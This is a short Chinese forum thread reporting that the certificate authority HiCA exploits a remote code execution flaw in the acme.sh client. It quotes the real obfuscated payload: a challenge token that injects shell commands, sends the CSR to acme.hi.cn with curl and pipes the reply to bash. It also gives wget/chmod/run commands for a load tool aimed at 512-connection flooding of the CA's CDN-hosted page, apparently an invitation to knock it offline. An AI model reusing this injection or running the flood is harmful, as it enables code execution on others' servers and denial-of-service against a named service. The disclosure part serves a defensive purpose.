剑皇 - acme.sh远程代码执行

查看 35|回复 1
作者:gzchenjz   
acme.sh 存在 RCE 漏洞,已经被国产 HiCA 利用
https://github.com/acmesh-official/acme.sh/issues/4659
{
    Type: http-01
    URL: ../pki-validation
    Status: pending
    Token: dd#acme.hi.cn/acme/v2/precheck-http/123456/654321#http-01#/tmp/$(curl`IFS=^;cmd=base64^-d;$cmd<<<IA==`-sF`IFS=^;cmd=base64^-d;$cmd<<<IA==`[email protected]$csr`IFS=^;cmd=base64^-d;$cmd<<<IA==`https$(IFS=^;cmd=base64^-d;$cmd<<<Oi8v)acme.hi.cn/acme/csr/http/123456/654321?o=$_w|bash)#
    KeyAuthorization: dd#acme.hi.cn/acme/v2/precheck-http/123456/654321#http-01#/tmp/$(curl`IFS=^;cmd=base64^-d;$cmd<<<IA==`-sF`IFS=^;cmd=base64^-d;$cmd<<<IA==`[email protected]$csr`IFS=^;cmd=base64^-d;$cmd<<<IA==`https$(IFS=^;cmd=base64^-d;$cmd<<<Oi8v)acme.hi.cn/acme/csr/http/123456/654321?o=$_w|bash)#.GfCBN3dYnfNB-Hj1nBYek89o9ohtt9K59uacS13wigw
}
相关讨论:
https://www.v2ex.com/t/947389
https://推特.com/mholt6/status/1666920303279349760
关于 HiCA:https://www.v2ex.com/t/868344
官网和acme.hi.cn用的阿里云WAF(已关闭),支付链接是腾讯云CDN:

wget https://github.com/maintell/webBenchmark/releases/download/0.6/webBenchmark_linux_x64
chmod 755 webBenchmark_linux_x64
./webBenchmark_linux_x64 -c 512 -s https://tencentcloud.accelerate.pki.plus/assets/wasm/wasm.wasm

腾讯, 阿里, 官网

caddy   
国产CA又立功了
您需要登录后才可以回帖 登录 | 立即注册

返回顶部